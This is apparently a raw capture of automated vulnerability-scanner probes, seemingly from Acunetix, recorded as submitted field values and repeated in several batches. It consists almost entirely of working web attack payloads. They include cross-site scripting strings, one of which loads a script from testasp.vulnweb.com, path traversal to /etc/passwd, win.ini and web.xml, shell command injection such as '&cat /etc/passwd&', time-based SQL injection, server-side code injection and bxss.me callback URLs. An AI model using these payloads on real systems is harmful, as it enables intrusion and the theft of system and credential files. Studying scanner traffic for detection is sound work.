acux8361\xc0\xbez1\xc0\xbcz2a\x90bcxuca8361

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(964627)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(902683)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(916053)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983545></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(947917)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(966796)">

1

1

response.write(9327724*9635828)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910671)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9327724*9635828)+'

1

1<div style=width:expression(prompt(941868))>

&cat /etc/passwd&

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9327724*9635828)+"

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<body onload=prompt(987705)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959477)>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(937880)>

1

cat /etc/passwd

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<img/src=">" onerror=alert(964781)>

1

`cat /etc/passwd`

1

${100471+99615}

1

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(929574)</sCripT>

|cat /etc/passwd#

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1&n971168=v974596

1some_inexistent_file_with_long_name%00.jpg

'|'ld

SH6IQc15'

1

\xf6<img acu onmouseover=prompt(948708) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WCwwYYtS')

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

"|"ld

vFyw8yA9'))

1<input autofocus onfocus=prompt(975717)>

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1

/etc/passwd

1

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

1

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_ZLNHV <ScRiPt >prompt(961551)</ScRiPt>

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit0QAX8vhDHC.bxss.me/

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

QEzHiLri'

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

nhOQJ18t')

1

'&dir&'

1

1

1

1

comments

file:///etc/passwd

1

T2XMsAQa'))

http://www.acunetix.tst

"&dir&"

'"

1

1

1'"()&%<ScRiPt >prompt(950317)</ScRiPt>

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

|dir

<!--

1

1

'"()&%<ScRiPt >prompt(993800)</ScRiPt>

1

WEB-INF/web.xml

1

'|dir

1

1

1

1_913655

1

"|dir

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2041\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2041

../../../../../../../../../../boot.ini

1

1

1

acux7405\xc0\xbez1\xc0\xbcz2a\x90bcxuca7405

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(921545)</ScRiPt>

1<script>prompt(970818)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(959857)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995163></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(960859)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(950108)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904021)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9120069*9584740)

1

1

1<div style=width:expression(prompt(978111))>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9120069*9584740)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

"+response.write(9120069*9584740)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(948131)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972589)>

WEB-INF/web.xml

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(911274)>

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1

-1

${99780+99395}

1<img/src=">" onerror=alert(974757)>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(908247)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n998611=v967575

1

1some_inexistent_file_with_long_name%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1&lt

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ZsiqieNn'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(993718) //\xf6>

"|"ld

1

1

testasp.vulnweb.com

J1tsSxy9')

^(#$!@#$)(()))******

/etc/passwd

'"()

1<input autofocus onfocus=prompt(998632)>

1

'

1

mvQBbvVC'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

"

-1

1

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1_FN3rK <ScRiPt >prompt(978900)</ScRiPt>

http://hitq0x6EbA1Yp.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

acunetix_wvs_invalid_filename

1

1

&dir

1

DUqHCe2l'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

'"

1

1

xZJ16EwS'

comments

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

<!--

1'"()&%<ScRiPt >prompt(999694)</ScRiPt>

7NTU4Drc'

1

1

1

1

WEB-INF/web.xml

|dir

1

MeszdB9d')

'"()&%<ScRiPt >prompt(947515)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1_922057

TiNhilyT'))

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu4739\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4739

1

1

../../../../../../../../../../boot.ini

1

1

1

acux8863\xc0\xbez1\xc0\xbcz2a\x90bcxuca8863

1

1<ScRiPt >prompt(910040)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(949299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(979323)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994419></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(914975)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(975113)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962584)"></g></svg>

1

response.write(9090348*9974340)

1

1

1<div style=width:expression(prompt(938711))>

1

WEB-INF/web.xml

1

'+response.write(9090348*9974340)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9090348*9974340)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(990722)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911191)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(966287)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img/src=">" onerror=alert(975287)>

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1<ScRiPt%20>prompt(900586)</sCripT>

1

|cat /etc/passwd#

${99201+100072}

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1&n932613=v969559

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(946121) //\xf6>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

2j75sj2h'

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(956218)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

testasp.vulnweb.com

'

D15ZZrqt')

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

ZQaHsgo8'))

"

1

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

-1

1

||cat /etc/passwd

1_SFQo5 <ScRiPt >prompt(940536)</ScRiPt>

1

http://hitb5HjpcA0lU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

-1)

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

1

'&dir&'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

v2guc3lc'

http://www.acunetix.tst

1

1

1

"&dir&"

1

comments/.

1

Acsd8pGw')

file:///etc/passwd

'"

1

1

1'"()&%<ScRiPt >prompt(936670)</ScRiPt>

1

|dir

<!--

1

jbinzoWl'))

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(924595)</ScRiPt>

'|dir

1

1

1

1

WEB-INF/web.xml

1

1_952537

1

"|dir

1

1

1

1

WEB-INF\web.xml

1

1

1

acu6320\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6320

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acux9789\xc0\xbez1\xc0\xbcz2a\x90bcxuca9789

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(982921)</ScRiPt>

1

1

1

1

1<script>prompt(997652)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(965307)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936892></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(987077)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(910679)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946703)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(915191))>

1

response.write(9938031*9694085)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1<iframe src='data:text/html

1

'+response.write(9938031*9694085)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<body onload=prompt(952535)>

"+response.write(9938031*9694085)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932056)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(908232)>

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(978653)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

|cat /etc/passwd#

${99242+99310}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(940852)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

1&n919421=v917799

-1)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1&lt

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

\xf6<img acu onmouseover=prompt(969119) //\xf6>

1

QZC0Ldrd'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

!(()&&!|*|*|

1<input autofocus onfocus=prompt(936842)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

oqmq02cf')

<a href='http://www.acunetix.com'>website security</a>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

'

^(#$!@#$)(()))******

1

1

1

4c33Quxg'))

1

[url=http://www.acunetix.com]website security[/url]

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

1

1

-1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1_z9obh <ScRiPt >prompt(911192)</ScRiPt>

acunetix_wvs_invalid_filename

http://hitiDuhoUoYBc.bxss.me/

1

1

1

||cat /etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1

1

1

1

&dir

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

comments/.

1

6yE235I3'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'"

1

"&dir&"

1

Ura6ZWuz')

1'"()&%<ScRiPt >prompt(988019)</ScRiPt>

1

1

<!--

1

|dir

D6lqRBjX'))

'"()&%<ScRiPt >prompt(938174)</ScRiPt>

1

file:///etc/passwd

1

1

1

1

'|dir

1

1_907031

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

acu10143\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10143

1

../../../../../../../../../../windows/win.ini

1

acux5966\xc0\xbez1\xc0\xbcz2a\x90bcxuca5966

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(918693)</ScRiPt>

1

1

1<script>prompt(931666)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(921201)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920318></ScRiPt>

1

................windowswin.ini

1

1<ScRiPt >prompt(917039)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(939574)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947084)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(967859))>

response.write(9070152*9876163)

1

1

1

1<iframe src='data:text/html

1

'+response.write(9070152*9876163)+'

1

1

&cat /etc/passwd&

WEB-INF/web.xml

1<body onload=prompt(969984)>

"+response.write(9070152*9876163)+"

1

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927397)>

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(924612)>

1

if(now()=sysdate(),sleep(6.97),0)/*'XOR(if(now()=sysdate(),sleep(6.97),0))OR'"XOR(if(now()=sysdate(),sleep(6.97),0))OR"*/

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(990834)>

1

1

1

1

(select(0)from(select(sleep(6.97)))v)/*'+(select(0)from(select(sleep(6.97)))v)+'"+(select(0)from(select(sleep(6.97)))v)+"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

${99720+99750}

1<ScRiPt%20>prompt(939412)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n976225=v982883

-1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

1

1

-1)

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(913932) //\xf6>

-1))

!(()&&!|*|*|

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

1

'"()

^(#$!@#$)(()))******

q9neseMk'

1<input autofocus onfocus=prompt(913186)>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

UL6XCI2E')

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

TVG3yLeT'))

1

'

[url=http://www.acunetix.com]website security[/url]

http://hitX6ODzNlHTP.bxss.me/

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1_b6KLj <ScRiPt >prompt(945167)</ScRiPt>

1

-1

1

"

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

1

1

||cat /etc/passwd

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

http://www.acunetix.tst

&dir

'"

1

1

comments

1

1

cQEE84GD'

<!--

1

'&dir&'

1

1

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(977484)</ScRiPt>

spMuDtjJ')

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(917950)</ScRiPt>

LsiXk90H'))

1

|dir

1_924240

1

1

WEB-INF/web.xml

1

'|dir

1

WEB-INF\web.xml

"|dir

1

acu3853\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3853

acux10328\xc0\xbez1\xc0\xbcz2a\x90bcxuca10328

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(945269)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(942748)</script>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(972834)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906315></ScRiPt>

1

1

1

1<ScRiPt >prompt(915578)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(933833)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973668)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(953308))>

1

1

response.write(9007017*9022865)

1

1

1

1<iframe src='data:text/html

'+response.write(9007017*9022865)+'

1

1

WEB-INF/web.xml

1<body onload=prompt(981971)>

1

&cat /etc/passwd&

"+response.write(9007017*9022865)+"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910265)>

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(900204)>

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(929254)>

if(now()=sysdate(),sleep(3.141),0)/*'XOR(if(now()=sysdate(),sleep(3.141),0))OR'"XOR(if(now()=sysdate(),sleep(3.141),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(932907)</sCripT>

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3.141)))v)/*'+(select(0)from(select(sleep(3.141)))v)+'"+(select(0)from(select(sleep(3.141)))v)+"*/

1

1&lt

1

${100102+99362}

1

1

|cat /etc/passwd#

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(946641) //\xf6>

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

'|'ld

1&n945282=v940346

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(913086)>

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

!(()&&!|*|*|

1

"|"ld

<a href='http://www.acunetix.com'>website security</a>

'"()

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Bhy3BXUC'

testasp.vulnweb.com

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_XukAj <ScRiPt >prompt(904935)</ScRiPt>

'

1

1

68owzTbz')

1

"

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitUBZ52PPXF5.bxss.me/

1

8YzXVMeu'))

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1)

1

'"

1

1

file:///etc/passwd

comments

http://www.acunetix.tst

'&dir&'

-1))

1'"()&%<ScRiPt >prompt(936979)</ScRiPt>

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

"&dir&"

jPHHB0Pg'

